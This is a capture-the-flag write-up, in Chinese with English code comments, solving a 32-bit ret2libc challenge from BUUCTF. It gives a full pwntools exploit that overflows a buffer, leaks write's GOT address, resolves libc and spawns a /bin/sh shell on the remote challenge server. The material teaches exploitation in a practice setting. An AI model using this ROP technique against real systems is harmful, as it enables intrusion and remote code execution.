BUUCTF 铁人三项(第五赛区)_2018_rop
还是一道ret2libc的题目
注意做题时积累32位和64位的不同处
这里由于用的是 write 泄露，所以 write 要传 3 个参数
记住:32位函数调用后要先将返回地址入栈 然后再依次压参数
第一次payload:
payload = 'A'*(0x88+4)                               # padding up to the saved return address (0x88 + 4, presumably saved ebp)
payload += p32(write_plt).decode('unicode-escape')   # overwrite the return address with write@plt
payload += p32(main_addr).decode('unicode-escape')   # write()'s own return address: back to main for stage 2
payload += p32(1).decode('unicode-escape')           # arg 1: fd = 1 (stdout)
payload += p32(write_got).decode('unicode-escape')   # arg 2: address of write's GOT entry (what gets leaked)
payload += p32(4).decode('unicode-escape')           # arg 3: count = 4 bytes, one 32-bit pointer
第二次payload:
payload = 'A'*(0x88+4)                               # same padding as the first stage
payload += p32(system_addr).decode('unicode-escape') # overwrite the return address with system()
payload += p32(main_addr).decode('unicode-escape')   # return slot after system(); the full exp below uses ret_addr here instead
# payload += 'A'*4
payload += p32(bin_sh_addr).decode('unicode-escape') # arg 1: pointer to "/bin/sh" inside libc
注意：这里 Libc 要选 5，一直选 0 一直 dump core...
完整exp:
from pwn import *
from LibcSearcher import *
# Debug-level logging prints every byte sent and received, which is how the leak below can be checked.
context.log_level = 'debug'
elf = ELF('./pwn')
p = remote('node4.buuoj.cn',29952)
# Return target after the leak so the program runs again and accepts the second payload.
main_addr = 0x80484C6
write_plt = elf.plt['write']
write_got = elf.got['write']
# NOTE(review): presumably a plain `ret` gadget used as the return slot after system();
# the walkthrough earlier on this page puts main_addr in that slot instead -- confirm.
ret_addr = 0x08048199
# Stage 1: overwrite the saved return address (0x88 bytes of buffer + 4, presumably saved ebp)
# and call write(1, write_got, 4) so the runtime address of write() is sent back to us.
# 32-bit cdecl layout on the stack: called function, its return address, then its arguments.
payload = 'A'*(0x88+4)
# NOTE(review): p32() returns bytes; decoding with 'unicode-escape' turns them into a str so they
# can be concatenated with the str padding. This relies on pwntools re-encoding the str on send;
# bytes >= 0x80 may not round-trip unchanged -- check the bytes actually sent in the debug log.
payload += p32(write_plt).decode('unicode-escape')
payload += p32(main_addr).decode('unicode-escape')   # write()'s return address: back to main
payload += p32(1).decode('unicode-escape')           # arg 1: fd = 1 (stdout)
payload += p32(write_got).decode('unicode-escape')   # arg 2: address of write's GOT entry
payload += p32(4).decode('unicode-escape')           # arg 3: count = 4 bytes, one 32-bit pointer
p.sendline(payload)
# The 4 bytes written back are the leaked pointer; ljust only matters if recv returned short.
write_addr = u32(p.recv(4).ljust(4,b'\0'))
print(hex(write_addr))
# Match the remote libc from the leaked write() address (see the note above about which candidate to pick).
libc = LibcSearcher('write',write_addr)
# libc base: runtime address minus the symbol's offset inside the matched libc.
offset = write_addr - libc.dump('write')
system_addr = offset + libc.dump('system')
bin_sh_addr = offset + libc.dump('str_bin_sh')
# Stage 2: same padding, then system("/bin/sh") with ret_addr in system()'s return slot.
payload = 'A'*(0x88+4)
payload += p32(system_addr).decode('unicode-escape')
payload += p32(ret_addr).decode('unicode-escape')    # return slot after system()
# payload += 'A'*4
payload += p32(bin_sh_addr).decode('unicode-escape') # arg 1: pointer to "/bin/sh" inside libc
p.sendline(payload)
p.interactive()